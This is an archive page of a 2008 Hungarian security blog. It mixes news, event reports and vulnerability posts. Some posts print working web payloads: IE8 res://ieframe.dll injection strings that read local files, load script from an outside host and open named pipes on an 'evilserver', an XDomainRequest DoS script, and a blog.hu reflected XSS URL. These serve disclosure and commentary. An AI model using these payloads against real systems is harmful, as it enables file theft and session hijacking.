A heise-online cikke alapján.
Fertőzött USB stickek a HP-tól
2008.04.10. 09:31 | buherator | 2 komment
A heise-online cikke alapján.
Címkék: worm hp
ISACA találkozó - beszámoló
2008.04.09. 21:35 | buherator | 5 komment
Mikor összeverődött a jelenlegi és régi "bűntársakból" álló banda, természetesen rögtön elkezdtük végigvenni a lehetséges forgatókönyveket, melyek közül a két legrémisztőbb az volt, hogy hatalmas szardobálás kerekedik a "két tábor" között, valamint hogy totális unalomba fullad a műsor. Nos, örömmel mondhatom - bár nem szeretem lelőni a poént - hogy ezek közül egyik sem következett be :)
Persze a "műsor" eleinte csendesen indult, lement néhány slide, de az eddig megtört fontosabb magyar szolgáltatók bemutatásakor végre elkezdődött egyfajta "sztorizgatás", amiből lassan kezdett kialakulni a várva várt vita. Ez talán a jól célzott "Van itt valaki az XY banktól/cégtől?" vagy "Az egyszer egy igen ismert szolgáltatónál..." kezdetű hozzászólásoknak is volt köszönhető, amelyek nem csak a "mi" oldalunkról, hanem az "öltönyös" társaságtól is érkeztek!
Innentől kezdve érezhető volt, hogy egy oldalon állunk, csak egyikünk az IT-biztonság elefántjának ormányát, másikunk pedig a farkát nézi. Maga a prezentáció ettől a pillanattól tulajonképpen csak a gondolatfolyamok mederben tartására szolgált (változó hatékonysággal), mivel a kibontakozó vita során a magyar IT-biztonsági helyzetet valamint ennek viszonyát a hackerekkel nagyrészt körbejártuk.
A legnagyobb érdeklődést kiváltó témák (már amennyire részekre lehet bontani az elhangzottakat) a hacker, mint fogalom, a hackelés és munkaerőpiac igényei, valamint a hackelséhez kapcsolódó erkölcsi aggályok voltak. Ezek közül én az első témát emelném, ki, mivel az ezzel kapcsolatos hozzászólásokból világosan kiderült az, hogy a magyar emberek gondolodásából a klasszikus értelemben vett "nagygép" hacker már érthető módon kiveszett, az új generációs, nem-hivatásos fehér/szürkekalaposok fogalma viszont még nem jutott el a legszűkebb rétegeken kívülre sem! Ez nem tudom, hogy országspecifikus jelenség-e, minden esetre elszomorítónak találom a dolgot, mivel ez azt jelenti, hogy a klasszikus értelemben vett, a felfedezés szépségéért művelt hackelés feledébe merült. Pedig az egyik úr ezen mesterség művelőinek szellemiségét egyenesen az őskeresztényekéhez hasonlította, ezt figyelembe véve pedig nagy ostobaság lenne részünkről, ha hagynánk ezt a kis szubkultúrát odaveszni!
Az ISACA.hu-s hírdetmény azzal a kérdéssel zárul, hogy "Vajon ki fog többet tanulni avagy ellesni a másiktól?" Nekem meggyőződésem, hogy mindkét tábor értékes tapasztalatokkal lett gazdagabb és a találkozó elérte célját: sikerült a "törvényen kívüli" hackereknek és a "törvények közé zárt" IT-security szakembereknek megmutatni, hogy amit egy köztük álló szakadéknak hittek, az legfeljebb csak egy kisebb árok, melyen megfelelő elhatározással bárki átléphet. Előrébb tarthatna a szakma, ha több ilyen alkalom lenne, szóval hajrá!
Címkék: isaca
Levetkőztem én is
2008.04.09. 11:47 | buherator | Szólj hozzá!
Címkék: css naked day
A tömegbe lőttek Kínában
2008.04.06. 09:54 | buherator | 7 komment
Tibet tartományon kívül, de tibetiek tüntettek csütörtök este két letartóztatott szerzetes kiszabadításáért. A rendőrök a tömegbe lőttek, egy emberjogi szervezet szerint nyolc embert megöltek.
Újabb halálos rendőrségi fellépésről érkezett hír Kínából. Ezúttal is tibeti nemzetiségűek tüntettek, de a demonstráció nem az ötvenes években elfoglalt Tibet tartományban, hanem az azzal határos kínai Szecsuánban történt. A lövéseket Kína elismerte, ám a halálos áldozatokról csak egy londoni központú tibeti szervezet számolt be.
Csütörtök este több száz tibeti vonult fel egy szecsuáni városban. A civilek és szerzetesek két szerzetes kiszabadítását követelték. Őket azért tartóztatták le, mert volt náluk egy dalai lámát ábrázoló kép.
A hivatalos kínai álláspont szerint a tömeg bántalmazott egy kínai tisztségviselőt. Figyelmezető lövéseket adtak le, hogy megfékezzék az erőszakot.
Ezzel szemben a Kampány a Szabad Tibetért nevű civil szervezet helyi szemtanúkra hivatkozva azt mondta, hogy a rendőrök váratlanul nyitottak tüzet az emberekre. Az emberekkel a városháza előtt elhitették, hogy teljesítik követeléseiket, ezért elvonultak. Kiderült azonban, hogy mégse engedték el a szerzeteseket. Ekkor az emberek visszafordultak, de egy úttorlasznál rendőrsorfalba ütköztek. A kínai rendőrök lőni kezdtek és nyolc embert megöltek. A halottak között három nő és egy szerzetes is van.
Március közepén kezdődtek a tüntetések Tibet fővárosában, egy Kína-ellenes felkelés évfordulóján. A kínai hatóságok brutálisan felléptek a fegyvertelen tömeggel szemben és már százakat tartóztattak le. A tüntetések átterjedtek néhány tibetiek lakta szecsuáni városra is. A kínai hatóságok tagadják, hogy bárkit megöltek volna, szerintük randalírozás közben halt meg néhány ember az elmúlt hetekben. Tibeti források viszont több mint száz lemészárolt emberről számoltak be.
Címkék: szabadság tibet
ISACA találkozó - időpont és egyebek
2008.04.05. 21:59 | buherator | 6 komment
Helyszín: PSzÁF székház (1013 Krisztina krt. 39.)
Időpont: 2008. 04. 09.-én szerdán, 16:30-tól.
Címkék: isaca
GoogleCode jelszó lenyúlása
2008.04.04. 21:42 | buherator | Szólj hozzá!
Billy egy speciális .jar fájlt töltött fel az egyik hibajelentése mellé. Ez a fájl bárki számára elérhető és a code.google.com domainen fut, ergo a same-origin policy is ezen a tartományon lesz értelmezve, ha sikerül lefuttatni a csomagban található Java kódot*.
Azért van szükség a kód becsomagolására, mert a JVM végez némi átalakítást az osztályok nevein mielőtt lekéri azokat, ezért a hosszú URL-t tartalmazó elérési út könnyen elromlik, az aapplet tag rchive attributumát azonban ez a kellemetlenség nem érinti, a megfelelő osztály pedig a code attributummal kiválasztható.
Ezek után nincs más dolgunk mint a GoogleCode-ba bejelentkezett felhasználót egy megfelelő oldalra irányítani, ahol is appletként betöltjük a JAR fájlt, ami átcsúszva a same-origin policyn szépen kiolvassa az összes érdekes adatot a code.google.com-ról:
Ez egyszerűen szép! :)
Címkék: google java bug
Kritikus hibák a Cisco termékeiben
2008.04.04. 21:06 | buherator | Szólj hozzá!
- Cisco Unified Communications Manager (CUCM) 5.x és 6.x
- Cisco Unified Communications Manager Business Edition
- Cisco Unified Presence 1.x és 6.x
- Cisco Emergency Responder 2.x
- Cisco Mobility Manager 2.x
Címkék: bug cisco
Apple - Microsoft 11:8
2008.04.04. 15:17 | buherator | Szólj hozzá!
A Microsoft 8 hibajavítást tervez kiadni a jövő héten esedékes frissítőkedden. Ezek közül öt hiba kritikus, melyek közül kettő eddig először a februárban megjelent Windows Server 2008-at is érinti.
Frissítsetek!
Címkék: windows patch quicktime
Negatív CAPTCHA
2008.04.04. 13:04 | buherator | 7 komment
A negatív CAPTCHA lényege az, hogy nem arra kényszeríti rá pl egy blog látogatóit, hogy bebizonyítsák azt hogy hús-vér emberek, hanem a robotokat veszi rá, hogy bebizonyítsák: nem azok! Tulajdonképpen egyfajta "mézesbödönről", honeypotról van szó: a védendő odlal tulajdonosa felvesz egy szövegmezőt minden űrlapjához, amit pl. CSS vagy JavaScript segítségével eltűntet a látogatók szeme elől. Csakhogy a crawlerek nem az oldal összképét, hanem annak forráskódját látják, ráadásul általában elég butuskák is szegények: mohón kitöltenek minden lehetséges mezőt a szemetükkel. Az embernek tehát nincs más dolga, mint kiszűrni azokat a kéréseket, amelyekben a felvett plusz mező ki van töltve, hiszen a valódi emberek általában nem foglalkoznak a nem látható mezők kitöltésével (tisztelet a kivételnek ;)).
Természetesen a módszer egyszerűen legyőzhető mondjuk úgy, hogy megtanítjuk a robotoknak, hogy milyen mezőket ne töltsenek ki, de ez csak oldal-specifikus spambotok esetén működik hatékonyan, általános célú programoknál igen bonyolult algoritmusokat kell alkalmazni a csapdák felismerésére. A negatív CAPTCHA-k tehát nem jelentenek univerzális megoldást a spamproblémára, de kellő megfontolás után az alkalmazása jelentősen megnövelheti egy oldal látogatóinak komforterzetét.
Címkék: spam captcha
Több mint 100 hiba a legnagyobb VoIP gyártók termékeiben
2008.04.04. 12:25 | buherator | Szólj hozzá!
A VoIPShield közleményében kiemelte, hogy a VoIP rendszerek elleni támadások alacsony száma miatt a felelős beosztásban dolgozó IT-biztonsági szakemberek sokszor elhanyagolják a VoIP rendszerek megfelelő biztosítását, pedig a hasonló rendszerek elterjedésével a rájuk irányuló támadások intenzitása is meg fog nőni.
A biztonsági cég jelenleg az érintett cégekkel együttműködve dolgozik a hibák kijavításán. Honlapjukon a felfedezett sebezhetőségek közül eddig 44-et tettek közzé. A későbbiekben valószínűleg kiterjesztik a kutatást más gyártók termékeire is.
Címkék: voip hírek cisco avaya nortel
IE8 ieframe sebezhetőségek
2008.04.03. 13:19 | buherator | 5 komment
Bevezető
HTML beszúrása
Fejlesztői eszközök
res://ieframe.dll/acr_error.htm#<iframe/src="http://0x000000.com/"/
width="1024"/height="1000"></iframe>,<h1>foo</h1>
Helyi fájlok megszerzése
res://ieframe.dll/acr_error.htm#<iframe/src=''/ onload='javascript:document.write("<iframe/src=\"file://localhost/test.txt\">
</iframe>")'></iframe>,foo
Script src használatával
res://ieframe.dll/acr_error.htm#<iframe/src=''/ onload='javascript:document.write("<script/src=http://www.0x000000.com/>
</script>")'></iframe>,foo
Az elnevezett csővezetékek kihasználása
\\ServerName\\pipe\\PipeName
\\.\pipe\PipeName
file:///\\evilserver\pipe\exploit
file:///\\localhost\pipe\exploit
Csatlakozás egy csővezetékhez res:// és file:// használatával
res://ieframe.dll/acr_error.htm#<iframe/src=''/
onload='javascript:document.location="file://..\\ServerName\\pipe\\PipeName"'>
</iframe>,foo
Az feloldás után:
\\ServerName\\pipe\\PipeName
Konklúzió
[1] További referencia az elnevezett csővezetékekről- http://www.514.es/download/Win32.Design.Flaws.pdf
Címkék: internet explorer csrf xss phishing spoofing named pipe ntml
Epilepsziás roham
2008.04.01. 20:18 | buherator | 6 komment
A fórumon elhelyezett linkek egy része a szintén az Anonymous csapat feketelistáján szereplő EBaumsWorld.com-ra irányított*. Ez az oldal arról ismert hogy engedély nélkül szerzett vicces anyagokat tesz közzé a saját logójával ellátva. Bár úgy tűnik ez a portál is megdőlt - jelenleg a felhasználói címsorban a "Hello, Administrator" felirat olvasható, az admin panere belépve pedig olyan beállítási lehetőségekkel találkozunk, hogy "Mit lopjunk el ma?" vagy akár a site logóját is lecserélhetjük - valószínűleg csak áprilisi tréfáról van szó.
* ebben én sem látom a logikát, de a Wired ezt írja, vagy nekem kéne még pár nyelvleckét vennem, esetleg többet aludnom...
A linkért egyébként köszi B$H-nak!
Címkék: incidens epilepszia anonymous
Légy Te a belügyminiszter!
2008.03.31. 14:27 | buherator | 6 komment
A biometrikus adatok ilyen módon történő felhasználása ugyanis komolyan veszélyeztetheti az emberek magánszféráját és biztonságát, ráadásul a Németországban bevezetni kívánt azonosító rendszerek üzembehelyezését folyamatos bakik kisérik.
A csapat az ujjlenyomatot egy "szimpatizáns" útján szerezte, aki elcsent egy Schäuble által korábban használt poharat egy konferenciáról. A klub tagjai további politikusok ujjlenyomataira is igény tartanának, ezért a Datenschleuderben egy külön útmutatót készítettek, melynek segítségével rögzíthetőek a különböző tárgyakon talált minták.
Címkék: privacy ccc
Megtörték a Hacker Webzine-t?
2008.03.31. 12:17 | buherator | 2 komment
Frissítés: Valószínűleg a tárhelyszolgáltató adta meg magát a ruszkiknak és a virtuális szerverek is bedőltek, de most már úgy tűnik helyreállt a dolog
Címkék: incidens the hacker webzine
IE8 perzisztens DoS
2008.03.30. 17:18 | buherator | Szólj hozzá!
<script>
// trying prototype hijacking here.
xdr = XDomainRequest;
xdr = function() {
return new XDomainRequest();
}
ping = 'hello';
xdr = new XDomainRequest();
xdr.open("POST", "http://cnn.com");
xdr.send(ping);
</script>
Olcsó húsnak híg a leve - AES-128 helyett XOR
2008.03.29. 11:38 | buherator | 4 komment
Címkék: rfid kriptográfia
Trágár levelek tömege startolt Gyurcsány e-mail címéről
2008.03.28. 21:38 | buherator | 10 komment
Mocskos szavakkal dúsított levelek sokaságát ontja miniszterelnök országgyűlési email-fiókja. A ferenc.gyurcsany@parlament.hu címről érkező, többek között a "basszátok meg" és a kurva ország" kifejezésekkel fűszerezett levelek természetesen hamisítványok, feladójuk nem a miniszterelnök. Daróczi Dávid kormányszóvivő szerint még kutatják, hogy valaki az informatikai rendszerbe hatolt be, netán más trükkel írogat a miniszterelnök nevében.
Mindenestre egy ilyen üzenet előállításához nem kell túl nagy technikai tudás, egy sima levelezőprogramban is szabadon beállítható a feladó. Különböző, ingyen hozzáférhető programnyelvekben is létezik egy mail függvény, amelyben szabadon beállítható a feladó címe, illetve a rendszer úgy kódolható, hogy pillanatok alatt több ezer üzenetet képes küldeni*.
Bruhaha** :) A parlament.hu-s programozók/rendszergizdák értik a dolgukat, biztos megtalálják a gazfickókat!
Update: 10 perc alatt 3 súlyos hibát találtam, lehet hogy az lenne a legcélszerűbb, ha fognák és kihúznák a vasat a konnektorból...
*Azért ehhez nem árt egy nyitott SMTP relay
** Ez egy politikailag semleges bruhaha
Címkék: bug parlament email spoofing
Kínai hackerek a rács mögött
2008.03.28. 13:07 | buherator | Szólj hozzá!
Címkék: kína hírek spyware
Linkcsokor
2008.03.28. 12:20 | buherator | Szólj hozzá!
Idén két perc kellett a MacBook (Air) feltöréséhez
Frissítés: Az Ubuntu maradt állva a PWN to OWN versenyen
Kritikus hibák a nyílt forrású médialejátszókban
Valamint megjelent a worldshots.hu-n egy érdekes kis irodalmi/kulturális összefoglaló:
Hackeriáda az OIK-ban
Címkék: vista kultúra ubuntu vlc macbook air pwn to own mplayer
BlackHat Europe
2008.03.27. 13:15 | buherator | 1 komment
Címkék: blackhat
Kritikus Safari sebezhetőségek
2008.03.27. 13:07 | buherator | Szólj hozzá!
Címkék: safari bug
ISACA találkozó
2008.03.27. 12:04 | buherator | Szólj hozzá!
További információk hamarosan az isaca.hu-n lesznek elérhetők.
Rycon.hu
2008.03.27. 11:44 | buherator | Szólj hozzá!
Címkék: mysql hacksite jelszótörés john the ripper
Még mindig a Scotland Yard...
2008.03.26. 12:15 | buherator | Szólj hozzá!
Címkék: sql injection
Blog.hu XSS
2008.03.24. 10:19 | buherator | 4 komment
http://blog.hu/index.php?posts=15&sentence=OR&s="><script src=https://m.blog.hu/ez/eznemegy/xss.txt> </script>&x=11&y=13
A hiba a keresőkifejezés megfelelő szűrésével orvosolható!